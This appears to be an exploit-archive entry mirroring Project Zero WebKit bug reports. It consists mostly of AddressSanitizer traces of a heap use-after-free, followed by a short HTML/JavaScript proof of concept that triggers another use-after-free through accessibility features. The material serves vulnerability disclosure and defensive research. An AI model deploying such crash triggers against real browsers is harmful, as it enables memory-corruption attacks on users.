#10 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)
#11 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)
#12 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)
#13 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)
#14 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)
#15 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)
#16 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)
#17 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)
#18 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)
#19 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)
#20 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)
#21 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)
#22 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)
#23 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)
#24 0x10c922b08 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3acb08)
#25 0x10cc39044 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6c3044)
#26 0x7fffe41e0ab1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55cab1)
#27 0x7fffe3d3cb57 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8b57)
#28 0x7fffe3d4a12d in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc612d)
#29 0x7fffe3e235ce in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x19f5ce)
#30 0x10c72ccb5 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage*, WebKit::WebFrame*, WTF::RefPtr<API::Object>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x1b6cb5)
#31 0x10cc439ae in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6cd9ae)
#32 0x111cd6602 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb21602)
#33 0x111cca297 in WebCore::FrameLoader::checkLoadComplete() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb15297)
#34 0x1119a03d1 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb3d1)
#35 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#36 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#37 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#38 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#39 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#40 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#41 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#42 0x10c64c3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#43 0x10c655888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
#44 0x11f0c4312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
#45 0x11f0c4d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
#46 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
#47 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
#48 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
#49 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
#50 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#51 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#52 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#53 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#54 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#55 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#56 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#57 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#58 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#59 0x10c56256c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#60 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x60c0000b7070 is located 48 bytes inside of 120-byte region [0x60c0000b7040,0x60c0000b70b8)
freed by thread T0 here:
#0 0x10f545294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x11f10bf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
#2 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)
#3 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)
#4 0x111fb570d in WebCore::TemplateContentDocumentFragment::~TemplateContentDocumentFragment() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0070d)
#5 0x111fb4b99 in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffb99)
#6 0x111fb4c5d in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffc5d)
#7 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)
#8 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)
#9 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)
#10 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)
#11 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)
#12 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)
#13 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)
#14 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)
#15 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)
#16 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)
#17 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)
#18 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)
#19 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)
#20 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)
#21 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)
#22 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)
#23 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)
#24 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)
#25 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)
#26 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)
#27 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)
#28 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)
#29 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)
previously allocated by thread T0 here:
#0 0x10f544d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x11f115ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x11f10ac4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x11f0a0437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x11f09f768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x1112fce08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08)
#7 0x111fa8d3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdf3d3d)
#8 0x111ecb5e3 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd165e3)
#9 0x111ec61a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4)
#10 0x111e8aac9 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9)
#11 0x111e89e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17)
#12 0x111e8a504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504)
#13 0x111feadf4 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe35df4)
#14 0x111fe7a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43)
#15 0x111fe583e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e)
#16 0x111eb7bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba)
#17 0x111eb7779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779)
#18 0x111eb69a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6)
#19 0x111eb842e in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e)
#20 0x1118a5351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351)
#21 0x1119e103d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d)
#22 0x1119a0386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#23 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#24 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#25 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#26 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#27 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#28 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#29 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) in WebCore::Node::nextSibling() const
Shadow bytes around the buggy address:
0x1c1800016db0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c1800016dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1800016dd0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c1800016de0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c1800016df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x1c1800016e00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd
0x1c1800016e10: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
0x1c1800016e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1800016e30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800016e40: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c1800016e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==29516==ABORTING
=================================================================
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1245
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.
PoC:
=================================================================
-->
<style>
#div { visibility: collapse }
</style>
<script>
function eventhandler() {
document.execCommand("bold", false);
img.style.removeProperty("-webkit-appearance");
img.setAttribute("aria-expanded", "false");
}
</script>
<div id="div">
<dl>
<canvas>aaa</canvas>
<img id="img" src="x" style="-webkit-appearance: relevancy-level-indicator;" onerror="eventhandler()">
<!--
=================================================================
ASan log:
